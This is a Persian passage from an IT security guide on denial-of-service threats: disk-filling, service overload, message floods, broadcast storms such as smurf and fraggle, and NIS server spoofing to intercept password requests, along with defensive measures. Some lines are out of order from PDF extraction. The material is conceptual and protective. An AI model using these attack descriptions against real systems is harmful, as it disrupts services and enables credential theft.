ﻭﻳﮋﮔﻲ quotaﺑﺮﺍﻱ ﺩﻳﺴﻚ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺖ )ﻣﻌﻤﻮ ﹰﻻ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Posixﻭﺍﺟﺪ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﻫﺴﺘﻨﺪ( .ﺑﺎ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﻣﻲﺗﻮﺍﻥ ﻫﺮ
ﻛﺎﺭﺑﺮ ﺭﺍ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﺴﻚ ﻣﺤﺪﻭﺩ ﻛﺮﺩ .ﺩﺭ ﻫﺮ partitionﻳﺎ ﺳﻴﺴﺘ ﹺﻢ ﻓﺎﻳﻞ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ،ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺩﻳﺴﻚ
qoutaﻣﺸﺨﺺ ﺷﻮﺩ .ﺩﺭ ﺗﺨﺼﻴﺺ ﻓﻀﺎﻱ ﻣﺠﺎﺯ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ،ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ partitionﻫﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺫﺧﻴﺮﺓ ﻧﺎﻣﻪﻫﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﻓﻀﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺖ ﭘﺮﺩﺍﺯﺷﻬﺎ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ.
ﻫﻤﭽﻨﻴﻦ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻔﻜﻴﻚ ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﻪ ﭼﻨﺪ partitionﻛﻮﭼﻜﺘﺮ ﻭ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺷﺎﺧﻪﻫﺎﻱ homeﻛﺎﺭﺑﺮﺍﻥ ﻣﺨﺘﻠﻒ ﺩﺭ
partitionﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ،ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻼﺕ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﻳﻚ partitionﺭﺍ ﺑﻄﻮﺭ
ﻛﺎﻣﻞ ﺍﺷﻐﺎﻝ ﻛﻨﺪ ،ﺍﻳﻦ ﺍﻣﺮ ﺗﺄﺛﻴﺮﻱ ﺑﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺳﺎﻳﺮ partitionﻫﺎ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﻳﻜﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺍﻳﻦ ﺷﻴﻮﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ
ﺷﺎﺧﻪﺍﻱ ﺑﻪ ﻓﻀﺎﻱ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﺑﻪ partitionﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﭘﻴﻮﻧﺪ
ﺳﺨﺖ ٣٠٨ﭘﺸﻨﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﻣﻴﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﭼﻨﺪ ﻛﺎﺭﺑﺮ ﻣﺘﻔﺎﻭﺕ ﭘﻴﻮﻧﺪ ﺳﺨﺖ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ.
ﺍﮔﺮ ﺷﻤﺎ ﺧﺪﻣﺎﺗﻲ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺍﺟﺎﺯﺓ ﺍﺷﻐﺎﻝ ﻓﻀﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﺩﻳﺴﻚ ﺭﺍ ﺑﺪﻫﻨﺪ )ﻣﺜ ﹰ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻼ
ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﻳﻚ ﭘﺎﻳﮕﺎﻩ FTPﺑﺎ ﺗﻮﺍﻧﺎﻳﻲ uploadﮔﻤﻨﺎﻡ( ،ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺠﺰﺍﻳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﺩﺭ ﻣﻌﺮﺽ
ﺳﺮﺭﻳﺰ ﻧﺒﺎﺷﻨﺪ .ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻣﻮﻗﺖ ﺗﻮﺍﻧﺎﻳﻲ ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﻓﺎﻳﻠﻬﺎ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭﺩﻫﻨﺪﻩ ﺍﺳﺖ ،ﺍﻣﺎ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻛﻞ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻏﻴﺮﻗﺎﺑﻞ ﺗﺤﻤﻞ ﻣﻲﺑﺎﺷﺪ.
ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ -ﺑﺨﺼﻮﺹ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ -ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﻗﺴﻤﺘﻲ ﺍﺯ ﺩﻳﺴﻚ ﺭﺍ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺍﺑﺮﻛﺎﺭﺑﺮ ٣٠٩ﺭﺯﺭﻭ ﻣﻲﻛﻨﻨﺪ .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ،ﺍﺑﺮﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﭘﺮ ﺷﺪﻥ ﺩﻳﺴﻚ ﺑﻪ ﺳﻴﺴﺘﻢ
ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻠﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺣﺎﻟﺖ ﺭﺍ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻓﺎﻳﻞ
ﺯﺍﺋﺪ ﺑﺰﺭﮒ ﺭﻭﻱ ﺩﻳﺴﻚ ﺷﺒﻴﻪﺳﺎﺯﻱ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﻄﻮﺭ ﻧﺎﮔﻬﺎﻧﻲ ﺑﻪ ﻓﻀﺎﻱ ﺧﺎﻟﻲ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ،ﺁﻧﺮﺍ ﭘﺎﻙ ﻧﻤﺎﻳﻴﺪ.
۳۰۶ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﺮﻣﻴﻢ ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﭘﺮﺩﺍﺯﻩﺍﻱ ﺭﺟﻮﻉ ﻛﻨﻴﺪ ﺑﻪ ﺑﺨﺶ ۲۴ﻛﺘﺎﺏ .PUIS
307 Distributed Task Scheduling System
308 Hard Link
309 Superuser
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤١٢
ﺑﺎﺭﮔﺬﺍﺭﻱ ﺳﺮﻭﻳﺲ
ﻳﻚ ﺳﺮﻭﻳﺲ ﺯﻣﺎﻧﻲ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻛﻪ ﺳﻴﻠﻲ ﺍﺯ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﻳﻚ daemonﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ
ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺳﺮﺍﺯﻳﺮ ﺷﻮﺩ .ﺍﻳﻦ ﺳﻴﻞ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻃﺮﻕ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﻪ ﻭﺟﻮﺩ ﺁﻳﺪ؛ ﻫﻢ ﺑﻪ ﺷﻜﻞ ﺗﺼﺎﺩﻓﻲ ﻭ ﻫﻢ ﺑﻪ ﺷﻜﻞ ﻋﻤﺪﻱ.
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺁﻧﭽﻨﺎﻥ ﻣﺸﻐﻮﻝ ﭘﺮﺩﺍﺯﺵ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻛﻨﺪ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺳﺎﻳﺮ ﻛﺎﺭﻫﺎ ﻃﺒﻖ ﺭﻭﺍﻝ
ﻋﺎﺩﻱ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺑﺪﻟﻴﻞ ﻋﺪﻡ ﻭﺟﻮﺩ ﻣﺤﻠﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩﺷﺪﻥ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻭﺍﻗﻌﻲ
ﻣﺠﺪﺩﹰﺍ ﺍﺭﺳﺎﻝ ﻣﻲﮔﺮﺩﻧﺪ ﻭ ﺑﻪ ﺑﺎ ﹺﺭ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺍﻓﺰﺍﻳﻨﺪ .ﺍﮔﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﺑﺎﻋﺚ ﺷﺮﻭﻉ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﺟﺪﻳﺪ ﻣﻲﺷﻮﺩ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ،
ﺳﻴﺴﺘﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ﻛﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﻔﻴﺪ ،ﺟﺎﻳﻲ ﺩﺭ ﺟﺪﻭﻝ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ .ﺑﻪ
ﻫﻤﻴﻦ ﺷﻜﻞ ،ﺍﻳﻦ ﺣﻤﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺍﺷﻐﺎﻝ ﺑﺨﺶ ﺍﻋﻈﻤﻲ ﺍﺯ ﺣﺎﻓﻈﻪ ،ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻳﺎ ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﺗﻮﺳﻂ ﺁﻥ ﺳﺮﻭﻳﺲ ﺷﻮﺩ.
ﺑﺎﺭ ﺍﺿﺎﻓﻲ ﻧﺎﺷﻲ ﺍﺯ ﺍﻳﻦ ﺣﻤﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﻧﻬﺎﻳﻲ ﻣﻬﺎﺟﻢ ﺑﺎﺷﺪ ،ﻭ ﻳﺎ ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﺣﻤﻠﻪﺍﻱ ﺩﺭ ﺟﺎﻳﻲ ﺩﻳﮕﺮ .ﺑﻌﻨﻮﺍﻥ
ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺳﺘﮕﺎﻩ ﺛﺒﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻤﻴﺰﻱ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺗﺎ ﺍﺯ ﺛﺒﺖ ﺷﺪﻥ ﺑﻪﻣﻮﻗ ﹺﻊ ﻭﺭﻭﺩ ﻭ ﺧﺮﻭﺝ ﺟﻠﻮﮔﻴﺮﻱ ﺑﻌﻤﻞ ﺁﻭﺭﺩ.
ﻼ
ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﻣﻨﺤﺮﻑ ﻛﺮﺩﻥ ﺗﻮﺟﻬﺎﺕ ﻭ ﻳﺎ ﻗﻄﻊ ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﻋﻤﻞ ﺩﻳﮕﺮﻱ -ﻣﺜ ﹰ
ﺑﻤﺐﮔﺬﺍﺭﻱ ﺩﺭ ﻳﻚ ﺍﺗﻮﻣﻮﺑﻴﻞ -ﺩﺭﺣﺎﻝ ﻭﻗﻮﻉ ﺍﺳﺖ.
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻧﺎﻇﺮ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﺸﻒ ﻧﻮﻉ ﻭ ﮔﺎﻫﻲ ﻣﺒﺪﺃ ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻣﺎﺷﻴﻨﻬﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ
ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺁﻧﻬﺎ )ﺁﺩﺭﺱ ﺭﻭﻱ ﻛﺎﺭﺕ ،ethernetﻭ ﻧﻪ ﺁﺩﺭﺳﻬﺎﻱ (IPﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺭﺩﻳﺎﺑﻲ ﻣﺒﺪﺃ ﻣﺸﻜﻞ -ﺍﮔﺮ ﺍﺯ ﺩﺍﺧﻞ ﺷﺒﻜﺔ ﺧﻮﺩﺗﺎﻥ
ﺑﺎﺷﺪ -ﻛﻤﻚ ﻛﻨﺪ .ﻫﻨﮕﺎﻡ ﺭﺩﻳﺎﺑﻲ ﻣﺸﻜﻞ ،ﻣﻨﻔﺼﻞ ﻛﺮﺩﻥ ﺷﺒﻜﻪ ﻭ ﺯﻳﺮﺷﺒﻜﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻛﻤﻚ ﻛﻨﺪ .ﺍﮔﺮ ﺩﺭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﺎ
ﻣﺴﻴﺮﻳﺎﺏ ﺧﻮﺩ ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ،ﺑﻪ ﺳﺮﻋﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻔﻬﻤﻴﺪ ﻛﻪ ﺣﻤﻠﻪ ﺍﺯ ﺩﺍﺧﻞ ﺷﺒﻜﻪ ﺑﻮﺩﻩ ﻳﺎ ﺧﺎﺭﺝ ﺁﻥ؛ ﭼﻮﻥ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ
ﺁﺩﺭﺱ IPﺑﺴﺘﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺮﺩ.
ﺍﮔﺮﭼﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻤﺎﻧﻌﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ ،ﺍﻣﺎ ﺍﻗﺪﺍﻣﺎﺕ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺻﺪﻣﺎﺕ
ﻭﺍﺭﺩﻩ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﻳﺎ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﻧﻬﺎ ﻣﻘﺎﻭﻡﺗﺮ ﺳﺎﺯﻳﺪ.
٣١٠
ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ
ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ ﻭﻗﺘﻲ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﻛﺎﺭﺑﺮﻱ ﺑﺎ ﺳﺮﺍﺯﻳﺮﻛﺮﺩﻥ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺑﻪ ﺁﺩﺭﺱ ﻳﻚ ﺳﻴـﺴﺘﻢ ،ﺳـﺮﻋﺖ ﭘـﺮﺩﺍﺯﺵ
ﺁﻧﺮﺍ ﺩﺭ ﺷﺒﻜﻪ ﻛﻢ ﻣﻲﻛﻨﺪ ﺗﺎ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﻋﺎﺩﻱ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﭘﻴﺎﻣﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﻓﺎﻳﻞ ،ﺳﺮﻭﻳﺲ
ﻭﺭﻭﺩ ،ﻭ ﻳﺎ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺳﺎﺩﺓ ﭘﮋﻭﺍﻙ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ ﺑﻪ ﻫﺮ ﺷﻜﻠﻲ ﻛﻪ ﺑﺎﺷﺪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻴﺸﺘﺮ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﺔ ﻣﻘـﺼﺪ ﺻـﺮﻑ
ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺷﻮﺩ .ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻻﺕ ﺍﻳﻦ ﺳﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﺩ ﻣﺎﺷﻴﻦ ﺑﻌﻠﺖ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺧﻄﺎﻫﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﻛﻤﺒﻮﺩ ﺣﺎﻓﻈﻪ
ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺎﻋﺚ ﺍﻧﺴﺪﺍﺩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺦ ﺑﻬﻨﮕﺎﻡ ﺩﻫـﺪ .ﻣﻬـﺎﺟﻢ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺳﻴﻞﺯﺩﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﻜﻪ ﭘﺎﺳ ﹺ
ﻼ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺭﺍ ﺳﻴﻞﺯﺩﻩ ﻛﻨـﺪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺑﺠﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﭘﺎﺳﺦ ﺩﻫﺪ .ﻣﺜ ﹰ
ﻭ ﺳﭙﺲ ﭘﺎﺳﺨﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ - NISﺧﺼﻮﺻﹰﺎ ﺩﺭﺧﻮﺍﺳﺖ ﺭﻣﺰ ﻋﺒﻮﺭ -ﺻﺎﺩﺭ ﻧﻤﺎﻳﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻧﻮﻉ ﻣﺸﺎﺑﻬﻲ ﺍﺯ ﺣﻤﻠﻪ ،ﻃﻮﻓﺎﻥ ﻋﺎﻡﮔﺴﺘﺮ ٣١١ﺍﺳﺖ .ﺑﺎ ﻃﺮﺍﺣﻲ ﺩﻗﻴﻖ ﻭ ﻣﺎﻫﺮﺍﻧﺔ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﻜﻪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴـﺎﻣﻲ ﺑـﺴﺎﺯﻳﺪ ﻛـﻪ ﻫـﺮ ﺭﺍﻳﺎﻧـﺔ
ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑﻪ ﭘﺎﺳﺦ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﻣﺠﺪﺩ ﺁﻥ ﻛﻨﺪ .ﺩﺭﻧﺘﻴﺠﺔ ﺍﻳﻦ ﺣﻤﻠﻪ ،ﺷﺒﻜﻪ ﺍﺷﺒﺎﻉ ﺷﺪﻩ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﮔـﺮﺩﺩ .ﻗﺒـﻞ ﺍﺯ
ﺍﻭﺍﺧﺮ ﺩﻫﺔ ١٩٩٠ﻃﻮﻓﺎﻧﻬﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺤﺼﻮﻻﺕ ﺩﺭﺣﺎﻝ ﺳﺎﺧﺘﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﺷﻜﺎﻻﺕ ﺑﻮﺩﻧـﺪ
ﻭ ﻳﺎ ﭘﻴﮑﺮﺑﻨﺪﻱ ﻧﺎﺩﺭﺳﺘﻲ ﺩﺍﺷﺘﻨﺪ ﻧﺎﺷﻲ ﻣﻲﺷﺪ ،ﺍﻣﺎ ﺍﻛﻨﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻃﻮﻓﺎﻥ ﻋﺎﻡﮔﺴﺘﺮ ﺭﺍ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﺍﻳﺠـﺎﺩ ﻛـﺮﺩ ﻭ
ﺣﻤﻼﺕ ﻣﻌﺮﻭﻑ ﺑﻪ smurfﻭ fraggleﻧﻴﺰ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻫﻤﻴﻦ ﻗﺒﻴﻞ ﻫﺴﺘﻨﺪ.
ﭘﺨﺶ ﭘﻴﺎﻣﻬﺎﻱ ﺑﺎ ﻗﺎﻟﺐ ﺍﺷﺘﺒﺎﻩ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺟﺐ ﺗﻮﻗﻒ ﻛﺎﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﺷﺒﻜﻪ ﮔﺮﺩﺩ .ﺍﮔﺮ ﻫﺮ ﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﮕﻮﻧـﻪﺍﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ
ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﭘﻴﺎﻣﻬـﺎﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺛﺒـﺖ ﻛﻨﻨـﺪ ،ﻃﻮﻓﺎﻧﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺁﻧﻘـﺪﺭ ﭘﻴـﺎﻡ ﺗﻮﻟﻴـﺪ ﻛﻨﻨـﺪ ﻛـﻪ ﺩﺭ ﻧﺘﻴﺠـﺔ ﺁﻧﻬـﺎ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﻫﻴﭻ ﻛﺎﺭﻱ ﺑﺠﺰ ﭘﺮﺩﺍﺯﺵ ﻭ ﺛﺒﺖ ﺧﻄﺎﻫﺎ ﻧﺒﺎﺷﻨﺪ.
